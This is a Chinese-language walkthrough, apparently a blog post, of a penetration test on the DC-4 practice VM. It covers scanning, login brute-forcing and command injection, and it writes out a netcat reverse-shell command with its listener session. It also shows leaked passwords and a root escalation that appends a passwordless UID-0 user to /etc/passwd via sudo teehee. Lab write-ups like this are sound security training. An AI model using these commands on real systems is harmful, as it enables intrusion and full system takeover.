DC-4靶机渗透测试报告

2022-08-10 19:34:26 浏览数 (1)

前言

咕了好久差点忘了~

信息收集

内网扫描一波找到目标,并通过nmap扫描其端口发现开着22、80端口

访问目标发现是一个登录框并提示admin登录

web渗透

利用burp的爆破模块得到账号密码为 admin/happy(但是我没爆破出来.jpg

发现可以执行命令,于是尝试抓包改参数执行命令

接着我们就可以构造payload通过nc反弹shell

代码语言:javascript复制
nc 192.168.233.128 4444 -e /bin/bash

进去后查看home目录下有三个用户:charles、jim、sam,其中只有jim用户存在可用信息并找到了一个密码本

代码语言:javascript复制
root@kali:~# nc -lvvp 4444
listening on [any] 4444 ...
192.168.233.134: inverse host lookup failed: Unknown host
connect to [192.168.233.128] from (UNKNOWN) [192.168.233.134] 35700
whoami
www-data
ls
command.php
css
images
index.php
login.php
logout.php
cd /home
ls
charles
jim
sam
ls charles/
ls sam/
ls jim/
backups
mbox
test.sh
ls backups/
old-passwords.bak
cat backups/old-passwords.bak
000000
12345
iloveyou
......

接着我们就利用该密码本成功爆破出该ssh账号密码为 jim/jibril04

然后我们就可以ssh连上查看jim目录下的mbox,发现是root发的邮件

于是我们前往 /var/mail 查看邮件,进而发现 charles 的密码 ^xHhA&hvim0y

然后我们切换到 charles 用户,使用 sudo -l 发现 teehee 用户不用输入密码便可以有root权限

于是我们可以利用 teehee 提权,通过 teehee 用户添加一个admin用户

代码语言:javascript复制
echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

最后切换到admin用户即可获取root权限,进而得到flag

0 人点赞